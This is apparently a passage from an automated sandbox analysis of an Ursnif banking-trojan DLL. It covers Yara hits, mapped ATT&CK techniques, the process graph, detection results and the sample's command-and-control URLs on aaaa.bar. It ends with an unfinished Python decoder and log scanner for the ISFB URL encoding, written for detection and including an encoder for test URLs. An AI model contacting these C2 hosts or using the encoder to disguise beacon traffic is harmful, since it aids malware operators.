                      Source: Yara matchFile source: 00000009.00000003.669217152.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 2908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4892, type: MEMORYSTR
                      Source: Yara matchFile source: 6.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.f30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.37194a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.37194a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.563086752.00000000030D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation2 | DLL Side-Loading1 | DLL Side-Loading1 | Obfuscated Files or Information1 | Credential API Hooking3 | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Process Injection112 | Software Packing1 | Input Capture1 | File and Directory Discovery1 | Remote Desktop Protocol | Credential API Hooking3 | Exfiltration Over Bluetooth | Encrypted Channel11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter1 | Logon Script (Windows) | Logon Script (Windows) | DLL Side-Loading1 | Security Account Manager | System Information Discovery3 | SMB/Windows Admin Shares | Input Capture1 | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | PowerShell1 | Logon Script (Mac) | Logon Script (Mac) | Rootkit4 | NTDS | Query Registry1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol3 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading1 | LSA Secrets | Security Software Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion1 | Cached Domain Credentials | Virtualization/Sandbox Evasion1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection112 | DCSync | Process Discovery2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Regsvr321 | Proc Filesystem | Remote System Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Rundll321 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                      Behavior Graph


                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 506330
Sample: gECym.bin
Startdate: 20/10/2021
Architecture: WINDOWS
Score: 100

Start (node 2):
• DNS/IP: dart.l.doubleclick.net 172.217.168.38, 443, 49824, 49825 GOOGLEUS United States
• DNS/IP: tls13.taboola.map.fastly.net 151.101.1.44, 443, 49832, 49833 FASTLYUS United States
• 16 other IPs or domains
• Signature: Multi AV Scanner detection for submitted file
• Signature: Sigma detected: Powershell run code from registry
• Signature: Yara detected Ursnif
• 8 other signatures
• started: loaddll32.exe 7 (node 8)

loaddll32.exe (node 8):
• DNS/IP: aaaa.bar 31.220.111.98, 443, 49952, 49954 AS-HOSTINGERLT Lithuania
• Signature: Writes or reads registry keys via WMI
• Signature: Writes registry values via WMI
• started: regsvr32.exe (node 12), cmd.exe (node 16), iexplore.exe (node 18), rundll32.exe (node 20)

regsvr32.exe (node 12):
• DNS/IP: aaaa.bar
• Signature: System process connects to network (likely due to code injection or exploit)
• Signature: Writes or reads registry keys via WMI
• Signature: Writes registry values via WMI

cmd.exe (node 16):
• started: rundll32.exe (node 22)

iexplore.exe (node 18):
• DNS/IP: 192.168.2.1 unknown unknown

rundll32.exe (node 22):
• DNS/IP: aaaa.bar
• Signature: System process connects to network (likely due to code injection or exploit)
• Signature: Writes registry values via WMI


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
gECym.dll | 11% | Virustotal |
gECym.dll | 6% | ReversingLabs |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
0.1.loaddll32.exe.10000000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.1.regsvr32.exe.10000000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.1.loaddll32.exe.10000000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
6.1.rundll32.exe.10000000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.loaddll32.exe.10d0000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
4.1.rundll32.exe.10000000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.loaddll32.exe.10000000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
https://aaaa.bar/ | 0% | Virustotal |
https://aaaa.bar/ | 0% | Avira URL Cloud | safe
https://aaaa.bar/jdraw/5EykzOMH8AC5xhH2f/h8YTRIF2mRSj/KI86vZ_2Fir/d_2FuekCCAOUjf/zFWcX3e13Ac_2BX_2BJGA/HUhc5yQiyPXedVM9/FyaB9AafT7f6pn1/rx17UyN0GmK2igoXTb/2p_2Bsvx3/fo8we1bgw6ZsfyAC6K72/DEX9YIVMXwvcSkZsNZR/8w9U8utAyGo407eExfiyfi/bLDkUZuz9hmdJ/XGInYyFxli4cy/JoKC.crw | 0% | Avira URL Cloud | safe
https://aaaa.bar/jdraw/yQNRXOou_2F/TKb_2FDPLUxEHX/34UsINmRGrF0U0brjExsG/R8lvAy6e3bs7Nh2H/QoLe_2Bwp2v2e8Z/IwuiqSnSaPWQnudhme/0fUiRiwnK/HC2m5rShJXeZnaMhBAa7/2sv1pUExc23tcG4uzbe/S9YqUCaVHHJSHD_2FHBasu/DOlWi2P1fW4xM/vPgP1tY3/PB1yvdHjP2kNFl0vG_2Fhxc/khv1QiPG/3tnR7uH.crw | 0% | Avira URL Cloud | safe
https://aaaa.bar/jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovu | 0% | Avira URL Cloud | safe
https://aaaa.bar/jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovuxQrp7KsWgS/wBggvPBS/iWInt5CFnJyvSqpyHgJyYxn/O_2F_2BUYe/fLDTk5RpDf_2F9mZ_/2F7NAIxeGgZa/QcsaY21TZZx/U7QIv9qlBRWqpg/DR61HU_2FzqgxKP2wonEs/EkSZK.crw | 0% | Avira URL Cloud | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2Cb_auto/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Faedbb0638c2ccabdeb958fc2d93204dc.jpg | 0% | Avira URL Cloud | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5b179a030c29a1ac065fdc22323514dd.png | 0% | Avira URL Cloud | safe
https://aaaa.bar/jdraw/NO7gR0KTty/Oqx9aKgxsT2Y54eU9/T_2Fq68MoL8B/sVtG7ExwGuN/2b4WQXmrNjZqxz/IsPGuUpM_2FQweZHv_2BB/qSCYCr2zsOkbh38r/It4yIHc8jFLoOJQ/k2WdhsET8UEtCwKWoz/qKONYcQpl/QBJ1lUtsdnk2R51rdvsn/Du_2F_2Ftub4vOTuIOX/47sdvY8Q/mQd32Pz7EA_2F/N.crw | 0% | Avira URL Cloud | safe
https://aaaa.bar/jdraw/MVdZIiu0NzX64W/jGgxHg6bC6YiiTOGCL_2B/K5_2B4OguOIrq_2F/deq5LFM1_2Fh_2B/A30hkj4LBKS8PnjdwI/9w5zD21KD/Gv4zCmpHpXW8kBPJ6yzJ/GKf4n1QcwBRAhkvF2a_/2BDpnBrAV7AZvGg_2FwtGG/RaDUbMye7jqhn/NmN4Vf9F/bD7myyGQXfiKlv1_2BoXKI7/VLTDzeWG/dZ.crw | 0% | Avira URL Cloud | safe
https://aaaa.bar/jdraw/H4GjPkmE7AedOn2/SaetnicpaebgBYZBph/BvmQBH2Ya/Oa7o5fA_2FxihzNsKVGG/_2BKOERN0ze3StZ8PJO/K9jrlAYK2cirYDQTLgJFGo/m_2BMIG_2Ff7J/M2tNW_2B/JwKxyFyNvYCJPpLYcu2z3fg/Co6_2F9DSd/aeV2iIileaWP_2B3q/B8Ii95Syxk_2/BFqOHwCSf6U/KnFKNxJjQfI9vK/6tnrhCZ8FpH5l_2FDWF/lT.crw | 0% | Avira URL Cloud | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5282696e9e2aabcd3d346a6d7ed7591e.png | 0% | Avira URL Cloud | safe
https://ad-delivery.net/px.gif?ch=1&e=0.9973131461099627 | 0% | Avira URL Cloud | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F18faa6af75b04f0199f63404d815074b.jpg | 0% | Avira URL Cloud | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F0d7ca0c89d5d09bf1d71170b01c3a769.jpg | 0% | Avira URL Cloud | safe
https://aaaa.bar/jdraw/6ybu_2FNdKF0gG/m7orpeXdQJjdHGv7mDMIL/JfKVVeTDKq1gaDX7/GcXqJLlu546KZ6e/n4P4OzwLSG43PTmkn1/t0lauqlYi/uThwI2_2Bb89U_2F9plY/Zxq7QGyY_2FF4AUNHAt/i342YI4jYPKMWYQUn0qvUq/ia1VXOlbfvfYW/_2BuG_2B/Dlgb1sPi5LA4l6opVIFmhDT/0Z5HvD.crw | 0% | Avira URL Cloud | safe
https://aaaa.bar/jdraw/WNAlg8cEc/UcfXfHTDCraOPvAxQ0u0/IBGE8nVsnVmaTWmqt_2/FgXrkKfYI9UDVTSC9YOK9U/edsq3qaEaK4UV/nX98HXXg/zJ1jx_2BUw5Fkli5F8AIb_2/FG3fGkSRfJ/J4BestfVNDAUFKDxV/xH_2BYMBJKGO/i9O5kI15Exg/Ujf1s7nWsRKDBP/pBWe2EoKcTyJW0r5TV22O/pk_2FzstpMvpdzlO/Mq8HfsXB/P.crw | 0% | Avira URL Cloud | safe
https://aaaa.bar/jdraw/gquCtxgLcwr_2F/e84ivzpkcm6RjGEX01HRQ/1JrxRgAMZnr84pf7/d6zLleHTDCpRxyP/mtUcNkhWJ9YEaOQAKu/ZbEc2Du6X/JsZUowsYOu98vblofvm0/EeOsadhZCmRp8ZCZ8KO/Ei99ya5BDB6uxeZYaXwGYu/W7LMC3IC7p7Aq/X8nzxfM9/9M7hUrRFHoU/Zf8MWsTW.crw | 0% | Avira URL Cloud | safe
https://btloader.com/tag?o=6208086025961472&upapi=true | 0% | URL Reputation | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpg | 0% | Avira URL Cloud | safe
https://aaaa.bar/jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggF3y7v/VMJcRRP5R6TojvxFTX/kOSl73q2F/w8Q6acp8KbUFCwTOVCqa/KHPQFw1IxW8ntmCw6R5/_2FriFMvRAS7jKjzJNgjI_/2B3Jlm1ZTjVZL/7f9n_2Fm/j0A3VF_2BTXTJlyVXccf7gs/IMfn4fjHWd/I3IboiX_2F3/uQt3.crw | 0% | Avira URL Cloud | safe
https://aaaa.bar/jdraw/hqka30Wii/31Oq5rEnSRjUxODbgauN/3Qomlb_2B6I7h2xlFjq/YffmBTpCRrKlCahwBmdROz/L3L_2BpluTz9H/ch5yKjwO/n0FR27CV_2B_2FzpXk9iMJC/P_2Fk2e7Yv/b_2BW31QojrkMDFWC/tZHFJBu8lQql/OZI9lNxt6O0/sFuOUiC9FGcBD8/qZGUVX5D_2FYXiueA015K/GMEnEsw.crw | 0% | Avira URL Cloud | safe
https://aaaa.bar/jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggF | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
contextual.media.net | 23.211.6.95 | true | false | | high
dart.l.doubleclick.net | 172.217.168.38 | true | false | | high
tls13.taboola.map.fastly.net | 151.101.1.44 | true | false | | high
aaaa.bar | 31.220.111.98 | true | false | | high
myip.opendns.com | 102.129.143.33 | true | false | | high
hblg.media.net | 23.211.6.95 | true | false | | high
lg3.media.net | 23.211.6.95 | true | false | | high
resolver1.opendns.com | 208.67.222.222 | true | false | | high
btloader.com | 104.26.7.139 | true | false | | high
geolocation.onetrust.com | 104.20.184.68 | true | false | | high
ad-delivery.net | 104.26.3.70 | true | false | | high
www.msn.com | unknown | unknown | false | | high
ad.doubleclick.net | unknown | unknown | false | | high
srtb.msn.com | unknown | unknown | false | | high
img.img-taboola.com | unknown | unknown | false | | high
web.vortex.data.msn.com | unknown | unknown | false | | high
222.222.67.208.in-addr.arpa | unknown | unknown | false | | high
cvision.media.net | unknown | unknown | false | | high

                                                          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://ad.doubleclick.net/favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 | false | | high
https://aaaa.bar/jdraw/5EykzOMH8AC5xhH2f/h8YTRIF2mRSj/KI86vZ_2Fir/d_2FuekCCAOUjf/zFWcX3e13Ac_2BX_2BJGA/HUhc5yQiyPXedVM9/FyaB9AafT7f6pn1/rx17UyN0GmK2igoXTb/2p_2Bsvx3/fo8we1bgw6ZsfyAC6K72/DEX9YIVMXwvcSkZsNZR/8w9U8utAyGo407eExfiyfi/bLDkUZuz9hmdJ/XGInYyFxli4cy/JoKC.crw | true | Avira URL Cloud: safe | unknown
https://aaaa.bar/jdraw/yQNRXOou_2F/TKb_2FDPLUxEHX/34UsINmRGrF0U0brjExsG/R8lvAy6e3bs7Nh2H/QoLe_2Bwp2v2e8Z/IwuiqSnSaPWQnudhme/0fUiRiwnK/HC2m5rShJXeZnaMhBAa7/2sv1pUExc23tcG4uzbe/S9YqUCaVHHJSHD_2FHBasu/DOlWi2P1fW4xM/vPgP1tY3/PB1yvdHjP2kNFl0vG_2Fhxc/khv1QiPG/3tnR7uH.crw | true | Avira URL Cloud: safe | unknown
https://aaaa.bar/jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovuxQrp7KsWgS/wBggvPBS/iWInt5CFnJyvSqpyHgJyYxn/O_2F_2BUYe/fLDTk5RpDf_2F9mZ_/2F7NAIxeGgZa/QcsaY21TZZx/U7QIv9qlBRWqpg/DR61HU_2FzqgxKP2wonEs/EkSZK.crw | true | Avira URL Cloud: safe | unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2Cb_auto/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Faedbb0638c2ccabdeb958fc2d93204dc.jpg | false | Avira URL Cloud: safe | unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5b179a030c29a1ac065fdc22323514dd.png | false | Avira URL Cloud: safe | unknown
https://aaaa.bar/jdraw/NO7gR0KTty/Oqx9aKgxsT2Y54eU9/T_2Fq68MoL8B/sVtG7ExwGuN/2b4WQXmrNjZqxz/IsPGuUpM_2FQweZHv_2BB/qSCYCr2zsOkbh38r/It4yIHc8jFLoOJQ/k2WdhsET8UEtCwKWoz/qKONYcQpl/QBJ1lUtsdnk2R51rdvsn/Du_2F_2Ftub4vOTuIOX/47sdvY8Q/mQd32Pz7EA_2F/N.crw | true | Avira URL Cloud: safe | unknown
https://aaaa.bar/jdraw/MVdZIiu0NzX64W/jGgxHg6bC6YiiTOGCL_2B/K5_2B4OguOIrq_2F/deq5LFM1_2Fh_2B/A30hkj4LBKS8PnjdwI/9w5zD21KD/Gv4zCmpHpXW8kBPJ6yzJ/GKf4n1QcwBRAhkvF2a_/2BDpnBrAV7AZvGg_2FwtGG/RaDUbMye7jqhn/NmN4Vf9F/bD7myyGQXfiKlv1_2BoXKI7/VLTDzeWG/dZ.crw | true | Avira URL Cloud: safe | unknown
https://aaaa.bar/jdraw/H4GjPkmE7AedOn2/SaetnicpaebgBYZBph/BvmQBH2Ya/Oa7o5fA_2FxihzNsKVGG/_2BKOERN0ze3StZ8PJO/K9jrlAYK2cirYDQTLgJFGo/m_2BMIG_2Ff7J/M2tNW_2B/JwKxyFyNvYCJPpLYcu2z3fg/Co6_2F9DSd/aeV2iIileaWP_2B3q/B8Ii95Syxk_2/BFqOHwCSf6U/KnFKNxJjQfI9vK/6tnrhCZ8FpH5l_2FDWF/lT.crw | true | Avira URL Cloud: safe | unknown
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location | false | | high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5282696e9e2aabcd3d346a6d7ed7591e.png | false | Avira URL Cloud: safe | unknown
https://ad-delivery.net/px.gif?ch=1&e=0.9973131461099627 | false | Avira URL Cloud: safe | unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F18faa6af75b04f0199f63404d815074b.jpg | false | Avira URL Cloud: safe | unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F0d7ca0c89d5d09bf1d71170b01c3a769.jpg | false | Avira URL Cloud: safe | unknown
https://aaaa.bar/jdraw/6ybu_2FNdKF0gG/m7orpeXdQJjdHGv7mDMIL/JfKVVeTDKq1gaDX7/GcXqJLlu546KZ6e/n4P4OzwLSG43PTmkn1/t0lauqlYi/uThwI2_2Bb89U_2F9plY/Zxq7QGyY_2FF4AUNHAt/i342YI4jYPKMWYQUn0qvUq/ia1VXOlbfvfYW/_2BuG_2B/Dlgb1sPi5LA4l6opVIFmhDT/0Z5HvD.crw | true | Avira URL Cloud: safe | unknown
https://aaaa.bar/jdraw/WNAlg8cEc/UcfXfHTDCraOPvAxQ0u0/IBGE8nVsnVmaTWmqt_2/FgXrkKfYI9UDVTSC9YOK9U/edsq3qaEaK4UV/nX98HXXg/zJ1jx_2BUw5Fkli5F8AIb_2/FG3fGkSRfJ/J4BestfVNDAUFKDxV/xH_2BYMBJKGO/i9O5kI15Exg/Ujf1s7nWsRKDBP/pBWe2EoKcTyJW0r5TV22O/pk_2FzstpMvpdzlO/Mq8HfsXB/P.crw | true | Avira URL Cloud: safe | unknown
https://aaaa.bar/jdraw/gquCtxgLcwr_2F/e84ivzpkcm6RjGEX01HRQ/1JrxRgAMZnr84pf7/d6zLleHTDCpRxyP/mtUcNkhWJ9YEaOQAKu/ZbEc2Du6X/JsZUowsYOu98vblofvm0/EeOsadhZCmRp8ZCZ8KO/Ei99ya5BDB6uxeZYaXwGYu/W7LMC3IC7p7Aq/X8nzxfM9/9M7hUrRFHoU/Zf8MWsTW.crw | true | Avira URL Cloud: safe | unknown
https://btloader.com/tag?o=6208086025961472&upapi=true | false | URL Reputation: safe | unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpg | false | Avira URL Cloud: safe | unknown
https://aaaa.bar/jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggF3y7v/VMJcRRP5R6TojvxFTX/kOSl73q2F/w8Q6acp8KbUFCwTOVCqa/KHPQFw1IxW8ntmCw6R5/_2FriFMvRAS7jKjzJNgjI_/2B3Jlm1ZTjVZL/7f9n_2Fm/j0A3VF_2BTXTJlyVXccf7gs/IMfn4fjHWd/I3IboiX_2F3/uQt3.crw | true | Avira URL Cloud: safe | unknown
https://aaaa.bar/jdraw/hqka30Wii/31Oq5rEnSRjUxODbgauN/3Qomlb_2B6I7h2xlFjq/YffmBTpCRrKlCahwBmdROz/L3L_2BpluTz9H/ch5yKjwO/n0FR27CV_2B_2FzpXk9iMJC/P_2Fk2e7Yv/b_2BW31QojrkMDFWC/tZHFJBu8lQql/OZI9lNxt6O0/sFuOUiC9FGcBD8/qZGUVX5D_2FYXiueA015K/GMEnEsw.crw | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name: https://aaaa.bar/
    Source: loaddll32.exe, 00000000.00000002.800125274.00000000011E8000.00000004.00000020.sdmp; regsvr32.exe, 00000003.00000003.750727112.0000000003333000.00000004.00000001.sdmp
    Malicious: false | Virustotal: 0% | Avira URL Cloud: safe | Reputation: unknown
Name: https://aaaa.bar/jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovu (partial string as found in memory)
    Source: loaddll32.exe, 00000000.00000002.800125274.00000000011E8000.00000004.00000020.sdmp
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown
Name: https://aaaa.bar/jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggF (partial string as found in memory; the complete URL appears in the network URL list above)
    Source: loaddll32.exe, 00000000.00000002.800982427.000000000123F000.00000004.00000020.sdmp; loaddll32.exe, 00000000.00000002.798415172.000000000116B000.00000004.00000020.sdmp
    Malicious: false | Avira URL Cloud: safe | Reputation: unknown
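The aaaa.bar URLs flagged malicious above all share one shape: a fixed first directory (jdraw), a run of path segments made of base64 characters with the sequences _2F and _2B inside them, and a decoy extension (.crw). Public analyses of the leaked ISFB (Gozi/Ursnif) source describe exactly this encoding for the C2 request path: the beacon data is Serpent-encrypted, base64-encoded, '+', '/' and '=' are rewritten to _2B, _2F and _0A, and slashes are inserted at arbitrary positions (which is why one segment above ends in a lone underscore and the next begins with 2B). The Python below is an added example written for this report, not sandbox output or code from the sample; it undoes the path encoding and returns the base64-decoded blob, and it scans constructed proxy log lines for URLs that decode this way. It does not decrypt the blob, because that needs the Serpent key from the sample's configuration, which this report does not provide. The 2-13 character segment length used to build test URLs and the treatment of the prefix as a per-campaign constant are assumptions; the log lines are constructed, with the first report URL embedded as one of them.

```python
"""Recover the encoded blob from Ursnif/ISFB-style URL paths.

Added example for this report; not sandbox output or code from the sample.
Anything not taken from the report is marked as an assumption below.
"""
import base64
import binascii
import random
import re
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Escapes applied by the ISFB URL encoder after base64, as described in public
# analyses of the leaked ISFB source: '+' -> '_2B', '/' -> '_2F', '=' -> '_0A'.
ESCAPES = {"+": "_2B", "/": "_2F", "=": "_0A"}
UNESCAPES = {enc: plain for plain, enc in ESCAPES.items()}

_SEGMENT_RE = re.compile(r"[A-Za-z0-9_]+")
_B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")

# First URL flagged malicious in the report's network list.
REPORT_URL = ("https://aaaa.bar/jdraw/6ybu_2FNdKF0gG/m7orpeXdQJjdHGv7mDMIL/"
              "JfKVVeTDKq1gaDX7/GcXqJLlu546KZ6e/n4P4OzwLSG43PTmkn1/t0lauqlYi/"
              "uThwI2_2Bb89U_2F9plY/Zxq7QGyY_2FF4AUNHAt/i342YI4jYPKMWYQUn0qvUq/"
              "ia1VXOlbfvfYW/_2BuG_2B/Dlgb1sPi5LA4l6opVIFmhDT/0Z5HvD.crw")


def recover_blob(url: str, prefix: str = "jdraw") -> Optional[bytes]:
    """Return the base64-decoded blob carried by an ISFB-style path, or None.

    prefix is the fixed first directory ('jdraw' in this report). Treating it
    as a per-campaign constant is an assumption, hence a parameter.
    """
    parts = urlparse(url).path.strip("/").split("/")
    if len(parts) < 3 or parts[0] != prefix:
        return None
    # The last segment carries a decoy extension ('.crw' in this report).
    stem, dot, ext = parts[-1].rpartition(".")
    if not dot or not ext.isalnum():
        return None
    segments = parts[1:-1] + [stem]
    if not all(_SEGMENT_RE.fullmatch(s) for s in segments):
        return None
    # Slashes sit at arbitrary positions and may split an escape across two
    # segments ('..._2FriFMvRAS7jKjzJNgjI_/2B3Jlm...' above), so join first.
    joined = "".join(segments)
    for enc, plain in UNESCAPES.items():
        joined = joined.replace(enc, plain)
    joined += "=" * (-len(joined) % 4)  # restore padding if the encoder dropped it
    if not _B64_RE.fullmatch(joined):
        return None
    try:
        return base64.b64decode(joined, validate=True)
    except (binascii.Error, ValueError):
        return None


def encode_blob(blob: bytes, prefix: str = "jdraw", ext: str = "crw",
                seed: int = 0, host: str = "aaaa.bar") -> str:
    """Inverse of recover_blob, used only to build constructed test URLs.

    The 2-13 character segment length is an assumption for this example, not a
    value taken from the sample; the RNG is seeded so results are reproducible.
    """
    text = base64.b64encode(blob).decode("ascii")
    for plain, enc in ESCAPES.items():
        text = text.replace(plain, enc)
    rng = random.Random(seed)
    segments, i = [], 0
    while i < len(text):
        n = rng.randint(2, 13)
        segments.append(text[i:i + n])
        i += n
    return f"https://{host}/{prefix}/" + "/".join(segments) + f".{ext}"


def find_c2_urls(log_text: str, prefix: str = "jdraw") -> List[Tuple[str, int]]:
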